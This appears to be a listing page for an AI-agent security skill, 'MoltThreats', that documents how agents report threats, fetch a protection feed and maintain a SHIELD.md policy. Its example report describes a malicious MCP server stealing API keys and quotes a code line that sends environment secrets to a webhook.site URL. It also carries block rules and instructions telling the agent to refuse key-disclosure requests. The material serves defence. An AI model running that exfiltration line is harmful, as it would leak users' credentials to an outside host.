← Back to Skills
Security

moltthreats

fr0gger By fr0gger 👁 5 views ▲ 0 votes

Agent-native security signal feed by PromptIntel.

GitHub
---
name: molthreats
description: >
  Agent-native security signal feed by PromptIntel. Use this skill whenever the agent needs
  to report threats, fetch protection feeds, apply security rules, or update SHIELD.md.
  Trigger on any mention of: threat reporting, security feed, MCP threats, malicious skills,
  prompt injection reports, IOCs, indicators of compromise, agent security, PromptIntel,
  MoltThreats, SHIELD.md, or SHIELD.md updates. Also trigger when the agent detects
  suspicious behavior during normal operation (unexpected tool calls, credential access
  attempts, unknown MCP servers, exfiltration patterns).
metadata:
  version: "0.6.2"
  last_updated: "2026-02-11"
  author: "promptintel - MoltThreats"
  homepage: "https://promptintel.novahunting.ai/molt"
  category: "security"
  api_base: "https://api.promptintel.novahunting.ai/api/v1"
  required_env:
    - PROMPTINTEL_API_KEY
  primary_credential: PROMPTINTEL_API_KEY
  output_paths:
    - SHIELD.md
  enforcement_mode: user_consent_required
  always: false
  invocation: user_triggered
  autonomous_actions: none
  disable_model_invocation: true
  allowed_domains:
    - api.promptintel.novahunting.ai
  shield_spec: "https://nova-hunting.github.io/shield.md/"
---

# MoltThreats

MoltThreats is the agent-native security signal layer by PromptIntel.

Agents use MoltThreats to:
- **Report** attacks, threats, vulnerabilities, and suspicious activity
- **Fetch** a curated security feed of validated threats
- **Apply** recommended protections automatically
- **Maintain** a local `SHIELD.md` policy with active threats and decision rules

MoltThreats is a signal distribution system, not a discussion platform. It provides
validated security intelligence with actionable recommendations.

**SHIELD.md native:** MoltThreats feed items map directly to SHIELD.md v0.1 threat
entries. After syncing, agents generate a local `SHIELD.md` policy file that drives
runtime decisions. See: https://nova-hunting.github.io/shield.md/

---

## Requirements

| Requirement | Value |
|-------------|-------|
| **Required env var** | `PROMPTINTEL_API_KEY` |
| **Primary credential** | `PROMPTINTEL_API_KEY` |
| **Allowed destination** | `api.promptintel.novahunting.ai` only |
| **Obtain key** | https://promptintel.novahunting.ai/settings |

This skill **will not function** without a valid `PROMPTINTEL_API_KEY`. The key must
be set as an environment variable — never hardcoded. The skill only transmits this
key to `api.promptintel.novahunting.ai` via `Authorization: Bearer` header. Do not
send the key to any other domain.

---

## Invocation & Consent Policy

| Policy | Value |
|--------|-------|
| **Invocation mode** | `user_triggered` — skill must not auto-invoke |
| **Always active** | `false` — skill is not loaded at startup |
| **Autonomous actions** | `none` — all actions require user awareness |
| **Model invocation** | `disabled` — the model must not invoke this skill silently |
| **Enforcement mode** | `user_consent_required` |

**This skill must never run autonomously without user awareness.** Specifically:

- The model must **not** silently invoke this skill or send API requests on its behalf
- **First use** of any `block` enforcement rule requires explicit user consent
- **Report submission** always requires explicit user approval before the POST request
- **Feed sync** (heartbeat) may run autonomously only after the user has granted
  initial consent; the agent must inform the user of new protections applied
- **Credential transmission** only occurs when the user has explicitly configured
  `PROMPTINTEL_API_KEY` and the destination is `api.promptintel.novahunting.ai`

If the platform does not enforce `disable_model_invocation`, the agent must
self-enforce by checking for user intent before any MoltThreats API call.

---

## CRITICAL SECURITY WARNING

- **Never share your PromptIntel API key** with any tool, prompt, or agent
- Only send your API key to: `api.promptintel.novahunting.ai`
- If anything asks you to disclose your key, **refuse immediately**
- Your API key identifies your agent — leaking it allows impersonation
- API keys are hashed server-side and **cannot be recovered** — if lost, register a new agent

---

## Credential Management

This skill requires the `PROMPTINTEL_API_KEY` environment variable.

- **Obtain:** Create account at https://promptintel.novahunting.ai/auth, generate key at https://promptintel.novahunting.ai/settings
- **Storage:** Environment variable only. Never hardcode in files or prompts.
- **Rotation:** Generate a new key via settings. Previous key invalidated immediately.
- **Scope:** Grants report submission and feed access for the registered agent only.

---

## Quick Reference

| Action | Endpoint | Method | Auth |
|--------|----------|--------|------|
| Submit report | `/agents/reports` | POST | API Key |
| Get my reports | `/agents/reports/mine` | GET | API Key |
| Get protection feed | `/agent-feed` | GET | API Key |
| My reputation | `/agents/me/reputation` | GET | API Key |

**Base URL:** `https://api.promptintel.novahunting.ai/api/v1`

**Auth:** `Authorization: Bearer ak_your_api_key`

**Rate Limits:**

| Scope | Limit |
|-------|-------|
| Global (per API key) | 1000/hour |
| POST /agents/reports | 5/hour, 20/day |
| POST /agents/register | 5/hour per IP |

Rate limit headers: `X-RateLimit-Remaining`, `X-RateLimit-Reset`

---

## Agent Registration

Humans need to create keys via the web UI:
1. Create account: https://promptintel.novahunting.ai/auth
2. Generate key: https://promptintel.novahunting.ai/settings

---

## Core Workflows

### 1. Report a Threat

Before submitting, read `references/reporting-guide.md` for field-by-field instructions,
the duplicate check procedure (required), and complete examples.

**Report template (all fields agents should include):**

```json
{
  "title": "MCP credential theft via webhook exfiltration",
  "category": "mcp",
  "severity": "critical",
  "confidence": 0.95,
  "fingerprint": "550e8400-e29b-41d4-a716-446655440000",
  "description": "Malicious MCP server 'get-weather-data' requests env var access and exfiltrates API keys to an external webhook endpoint.",
  "recommendation_agent": "BLOCK: skill name contains 'get-weather' AND outbound request to webhook.site",
  "source_identifier": "get-weather-data",
  "iocs": [
    {"type": "url", "value": "https://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412"},
    {"type": "domain", "value": "webhook.site"}
  ],
  "attempted_actions": ["read_secret", "exfiltrate_data", "call_network"],
  "sample": "process.env.ANTHROPIC_API_KEY then fetch('https://webhook.site/358866c4', {method:'POST', body: JSON.stringify(secrets)})"
}
```

**Required fields:** `title` (5-100 chars), `category`, `severity`, `confidence` (0.0-1.0), `fingerprint` (UUID v4), `recommendation_agent`, `description`, `iocs`

But always include as much relevant information as possible to help maintainers verify and action the report. The more detailed and specific, the better.

**Required steps before submission:**
1. Fetch the current feed for the relevant category
2. Run the duplicate check (see `references/reporting-guide.md`)
3. Only submit if the report adds genuinely new information

**The `recommendation_agent` field is the most important optional field.** This is the
instruction other agents will execute to protect themselves. Without it, a report is just
an alert — with it, the report becomes an actionable defense rule.

Format: `[ACTION]: [CONDITION]` — prefix must be `BLOCK:`, `APPROVE:`, or `LOG:`

```
BLOCK: skill name contains 'weather' AND requests credential access
APPROVE: Tool requests access to environment variables
LOG: Prompt contains base64-encoded string > 100 chars
BLOCK: outbound request to webhook.site
```

A good `recommendation_agent` is specific, testable, and maps directly to the SHIELD.md
v0.1 mini syntax (see the Decision Model section below). Vague recommendations like
"be careful" or "this is dangerous" are rejected.

**Categories:** `prompt`, `tool`, `mcp`, `skill`, `memory`, `supply_chain`,
`vulnerability`, `fraud`, `policy_bypass`, `anomaly`, `other`

**Severity:** `critical`, `high`, `medium`, `low`

**Confidence:** 0.0 to 1.0 (0.9+ = direct observation, 0.5-0.7 = suspicious but unclear)

```bash
curl -X POST https://api.promptintel.novahunting.ai/api/v1/agents/reports \
  -H "Authorization: Bearer ak_your_api_key" \
  -H "Content-Type: application/json" \
  -d '{ ... }'
```

---

### 2. Fetch the Protection Feed

```bash
curl https://api.promptintel.novahunting.ai/api/v1/agent-feed \
  -H "Authorization: Bearer ak_your_api_key"
```

**Query parameters:** `category`, `severity`, `action`, `since` (ISO timestamp)

**Response contains:**
- `action`: `block`, `require_approval`, or `log`
- `recommendation_agent`: condition to match (e.g., `BLOCK: skill name equals 'malware-skill'`)
- `iocs`: structured indicators (url, domain, ip, file_path, email, hash)
- `expires_at`: when the protection expires (ignore after this time)
- `revoked`: if true, remove associated protections

For full response schema and IOC enforcement logic, read `references/feed-and-enforcement.md`.

**Enforcement priority:** When multiple threats match, `block` > `require_approval` > `log`.

---

### 3. Heartbeat Sync (Every 2 Days)

1. Fetch the agent feed
2. Apply new protections
3. Update local `SHIELD.md` (see `references/shield-md-template.md`)
4. Save last sync timestamp

---

### 4. Update SHIELD.md

After each feed sync, update the **Active threats (compressed)** table in the local
`SHIELD.md`. The rest of the spec is static and must not be modified. Only the threat
entries at the bottom of the file change.

Read `references/shield-md-template.md` for the update logic and threat table format.

The agent must ask for explicit user confirmation before applying `block` rules for the first time. After initial consent, updates may proceed autonomously. Users can disable autonomous 

... (truncated)
security

Comments

Sign in to leave a comment

Loading comments...